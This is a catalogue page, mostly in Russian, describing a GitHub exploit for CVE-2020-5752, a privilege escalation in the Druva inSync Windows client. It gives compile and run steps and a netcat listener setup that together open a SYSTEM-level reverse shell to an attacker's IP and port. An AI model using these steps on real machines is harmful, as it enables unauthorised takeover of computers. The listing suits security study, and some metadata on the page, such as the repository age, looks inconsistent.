Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-5752 — Druva的本地权限提升 | Kitploit
Инструменты/GitHubGitHub/x0rbeexd/cve-2020-5752
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubx0rbeexd/cve-2020-5752

CVE-2020-5752

Druva的本地权限提升

Репозиторий
117 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-5752: Druva inSync локальное повышение привилегий

Эксплойт на C для Druva inSync Windows Client (v6.6.3 и ниже). Приложение предоставляет RPC-сервис на порту 6064, уязвимый к внедрению команд через path traversal. Это позволяет локальному пользователю выполнять произвольные команды от имени NT AUTHORITY\SYSTEM.

Детали уязвимости

  • CVE: 2020-5752
  • Протестировано на: Windows 10 (x64)
  • Уровень привилегий: Локальное повышение привилегий (LPE)

Использование

1. Компиляция

Используйте gcc (MinGW) для компиляции исходного кода:

root@kitploit:~
gcc exploit.c -o exploit.exe -lws2_32

2. Подготовка

Поместите копию nc.exe в каталог, доступный для учетной записи SYSTEM (например, C:\Windows\Tasks).

3. Запуск

Запустите прослушиватель на вашей атакующей машине:

root@kitploit:~

nc -lvnp 4444
Run the exploit on the target Windows machine:
root@kitploit:~
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей. Несанкционированное использование на системах, на которые у вас нет разрешения на тестирование, является незаконным.

Скачать инструмент